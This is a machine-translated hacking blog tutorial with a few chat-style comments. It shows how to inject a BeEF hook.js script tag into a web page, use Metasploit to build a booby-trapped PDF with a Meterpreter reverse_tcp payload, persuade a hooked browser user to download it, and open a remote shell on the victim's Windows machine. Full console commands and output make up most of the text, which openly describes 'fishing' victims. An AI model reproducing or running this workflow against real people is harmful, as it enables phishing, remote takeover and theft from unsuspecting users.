USE METASPLOIT AND BEEF
We immediately began to be ......
The first example we create your own web such as below ..
when ready for the web that we do not forget to put the script as follows:<script scr='http://(ip address):3000/hook.js'></script>
password and username is beef
root@bt:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 798 exploits - 435 auxiliary - 133 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
=[ svn r14682 updated 27 days ago (2012.02.03)
Warning: This copy of the Metasploit Framework was last updated 27 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > search adobe_pdf
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent Adobe PDF Embedded EXE Social Engineering
exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent Adobe PDF Escape EXE Social Engineering (No JavaScript)
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options
Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME evil.pdf no The output filename.
INFILENAME yes The Input PDF filename.
LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x (Windows XP SP3 English)
msf exploit(adobe_pdf_embedded_exe) > set FILENAME tutorial.pdf
FILENAME => tutorial.pdf
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/tutor.pdf
INFILENAME => /root/tutor.pdf
msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > show options
Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME tutorial.pdf no The output filename.
INFILENAME /root/tutor.pdf yes The Input PDF filename.
LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x (Windows XP SP3 English)
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(adobe_pdf_embedded_exe) > set id 0
id => 0
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Reading in '/root/tutor.pdf'...
[*] Parsing '/root/tutor.pdf'...
[*] Parsing Successful.
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Creating 'tutorial.pdf' file...
[+] tutorial.pdf stored at /root/.msf4/local/tutorial.pdf
here we can see the results of the generated payload that we put in the pdf.
and the pdf can be uploaded, after you copy the link into a web that you have created earlier.
Then we will be fishing victim to open our website in a way,
brooooo you do not want this great tutorial to learn and the language is not too high.
picture below we can see in the online browser that the victim was exposed.
Now we are more persuaded that he wants to download a pdf file that contains the payload before, by sending messages through Alert Dialog is contained in the Beef.
the victim IE will bring up a message that we have written earlier
we have started preparing for our fishing with the command below.
Here we will use a module multi handler, who is our listing.
msf exploit(adobe_pdf_embedded_exe) > back
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set id 0
id => 0
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
after we do the listing and the victim is also opening a pdf file by clicking open we will immediately get into Meterpreter.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1147) at 2012-03-01 01:25:39 +0700
meterpreter >
Here we are announcing that we have entered into Meterpreter can just type in the shell, we can automatically control the C: \ \ of the victim.
good luck I hope you succeed..................
Pusing ya? sama donk~
BalasHapushahahaha.....
Hapusy nih mas.....
mana g ada makanan lagi....
wkwkwkwk